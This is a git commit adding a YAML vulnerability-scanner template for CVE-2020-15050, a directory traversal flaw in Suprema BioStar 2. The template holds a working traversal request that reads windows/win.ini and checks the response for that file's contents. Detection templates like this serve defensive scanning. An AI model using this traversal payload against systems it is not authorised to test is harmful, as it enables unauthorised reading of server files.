Merge pull request #3847 from gy741/rule-add-v100

Create CVE-2020-15050.yaml
2022-03-08 11:17:43 +05:30 · 2022-03-08 11:17:43 +05:30 · 20e59be53c
parent 90e03e4e51 e14b913101
commit 20e59be53c
1 changed files with 30 additions and 0 deletions
--- a/cves/2020/CVE-2020-15050.yaml
+++ b/cves/2020/CVE-2020-15050.yaml
@ -0,0 +1,30 @@
+id: CVE-2020-15050
+
+info:
+  name: Suprema BioStar2 - Local File Inclusion (LFI)
+  author: gy741
+  severity: high
+  description: An issue was discovered in the Video Extension in Suprema BioStar 2 before 2.8.2. Remote attackers can read arbitrary files from the server via Directory Traversal.
+  reference:
+    - http://packetstormsecurity.com/files/158576/Bio-Star-2.8.2-Local-File-Inclusion.html
+    - https://www.supremainc.com/en/support/biostar-2-pakage.asp
+    - https://nvd.nist.gov/vuln/detail/CVE-2020-15050
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 7.50
+    cve-id: CVE-2020-15050
+  tags: cve,cve2020,lfi,suprema,biostar2
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/../../../../../../../../../../../../windows/win.ini"
+
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "bit app support"
+          - "fonts"
+          - "extensions"
+        condition: and